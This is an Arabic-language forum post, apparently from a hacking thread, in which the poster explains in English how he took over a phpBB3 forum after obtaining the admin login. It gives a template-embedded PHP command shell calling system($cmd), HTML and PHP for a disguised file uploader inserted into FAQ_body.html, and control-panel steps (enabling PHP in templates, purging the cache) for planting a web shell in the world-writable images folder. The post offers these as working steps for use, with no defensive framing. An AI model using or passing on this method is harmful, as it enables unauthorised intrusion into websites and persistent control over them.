data:image/s3,"s3://crabby-images/336f9/336f9a7e8dbbbcbe644fa7288ec67429ca91f348" alt="" | اقتباس | data:image/s3,"s3://crabby-images/0f232/0f232da51554b22c62097e939dedce1ad8ebf868" alt="" | | | data:image/s3,"s3://crabby-images/b3cbb/b3cbbc01c0d17a93e08cf30acd47eab967304719" alt="" | المشاركة الأصلية كتبت بواسطة nor15din | data:image/s3,"s3://crabby-images/ef2d0/ef2d08194a42d4cf51f9f7de29b4425aae0477af" alt="" | | | | | | | كيف لغمتهم ؟؟ ههه ارجووك كيف ؟؟ | | data:image/s3,"s3://crabby-images/ef135/ef1350a639a482e31426bfe0cd8622ecd6e8d465" alt="" | | data:image/s3,"s3://crabby-images/5d7aa/5d7aa491e1c8df3758bd3a79fb71f2e6393ae75b" alt="" | |
هههههههه أوكيه D: بس معلش, حقاك علي, راح اكتب بالإنجليزي لان اسهل علي... وأي توضيح, أنا جاهز.
------------------------------------
i searched online for hacking phpBB3 once i have the admin username and password. all i could find was that it's possible to include a php code inside the ACP
كود:
<!-- PHP -->
echo $cmd;
system($cmd);
<!-- ENDPHP -->
and that's considered a Shell
i liked it... but it was too much trouble doing all the php commands, so though, ok. i have access to change a page's php code... why not include an uploader and upload a shell? that's easier
i know how to code HTML so
كود:
ACP ->Styles -> Templates->Edit-> FAQ_body.html
i added this code in the body:
كود:
<table>
<form action="" enctype="multipart/form-data" method="post">
<tr>
<td colspan="2">H4v3 Fun Spiders Spooky AKA SpookWEB</td>
</tr>
<tr>
<td><input type="file" name="spiderF" /></td>
<td><input type="submit" name="submit" value="Spooky!" /></td>
</tr>
<tr>
</tr>
</form>
</table>
and in the end of the HTML i added this:
كود:
<!-- PHP -->
if (isset($_POST['submit'])) {
$spookf = $_FILES['spiderF']['name'];
$spookt = $_FILES['spiderF']['tmp_name'];
if (@move_uploaded_file($spookt , "./images/".$spookf)) {
echo "Shell Uploaded. Check /images/YourShell.php";}else{echo "Upload Failed";}}
<!-- ENDPHP -->
i picked images folder cause i searched and found that phpBB set it to chmod
777
so i have full access to it
Now i went back to the ACP and in "Server Settings" i changed "Allow PHP Code" to Yes
than, on the ACP, be sure to "Purge Cache" to ******* the template so that the code may work....
DONE! :D
بستعمل MS Maren
للكتابة بالعربية لان ال كيبورد عندي مافي عربي هههههه...
إذا مامشي ال حال, مستعد اكتيبو بالعربي بس حياخد وقت شوية....